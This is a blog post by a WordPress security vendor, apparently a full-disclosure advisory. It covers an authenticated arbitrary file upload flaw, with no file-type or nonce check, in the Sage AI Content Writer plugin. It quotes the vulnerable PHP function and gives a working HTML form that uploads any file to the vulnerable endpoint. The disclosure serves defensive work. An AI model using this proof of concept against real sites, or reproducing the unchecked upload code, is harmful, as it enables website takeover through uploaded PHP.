A lot has been made about the possible security risk with code created by ChatGPT whether in WordPress plugins or otherwise. A more pedestrian risk is that WordPress plugins that interact with that are themselves insecure, whether written by ChatGPT or not. On Friday, we found one of those had just added extremely vulnerable code that hackers would exploit. Another plugin added slightly less vulnerable code over the weekend.

One way we help to improve the security of WordPress plugins, not just for our customers of our service, but for everyone using them, is our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. Through that, we caught such a vulnerability being added to Sage AI Content Writer. The vulnerability, an authenticated arbitrary file upload vulnerability, which, as the name suggests, allows someone logged in to WordPress to upload arbitrary files to the website. An attacker could upload a .php file with malicious code and takeover the website.

Other code in the plugin looks to be insecure in a similar way to the vulnerable code, so we would recommend against using the plugin unless it is fully secured.

We now are also running all the code in the plugins used by our customers through that monitoring system on a weekly basis to provide additional protection for them.

The possibility of this vulnerability is also flagged by our Plugin Security Checker, so you can check plugins you use to see if they might have similar issues with that tool.

We tested and confirmed that our firewall plugin for WordPress protected against the vulnerability, even before we discovered the vulnerability, as part of its protection against zero-day vulnerabilities.

Authenticated Arbitrary File Upload

In version 2.4.4 of the plugin, a new function, sage_ai_chatbot_save_custom_icon(), was added and made accessible through WordPress AJAX functionality to those logged in to WordPress:

251

add_action( 'wp_ajax_sage_ai_chatbot_save_custom_icon', 'sage_ai_chatbot_save_custom_icon' );

The function, which is in the file /inc/admin/chatbot.php , doesn’t contain any checks to limit what types of files can be uploaded, before saving an uploaded file and showing where it is located on the website:

253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280

function sage_ai_chatbot_save_custom_icon() {
 
	if ( ! empty( $_FILES['customIcon']['name'] ) ) {
 
		$icon_file  = $_FILES['customIcon'];
		$upload_dir = wp_upload_dir();
 
		$icon_path_structure  = array( 'sage-ai-writer', 'chatbot', 'icons' );
		$icon_upload_path_dir = sage_ai_writer_create_dir( $icon_path_structure );
 
		$fileName = basename( $icon_file['name'] );
		$fileName = str_replace( ' ', '_', $fileName );
 
		// Generate a unique filename based on coupon ID
		$target_file = $icon_upload_path_dir . '/' . $fileName;
 
		error_log( print_r( $target_file, true ) );
 
		if ( file_exists( $target_file ) ) {
			wp_delete_file( $target_file );
		}
 
		// Move the uploaded file to the target directory
		if ( move_uploaded_file( $icon_file['tmp_name'], $target_file ) ) {
 
			$icon_url = $upload_dir['baseurl'] . '/sage-ai-writer/chatbot/icons/' . $fileName;
 
			wp_send_json_success( $icon_url );

There is also a lack of a nonce check, so this could also be exploited through cross-site request forgery (CSRF).

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will upload the file sent with the request to a location shown after the file is uploaded, when logged in to WordPress.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=sage_ai_chatbot_save_custom_icon" enctype="multipart/form-data" method="POST">
<input type="file" name="customIcon" />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?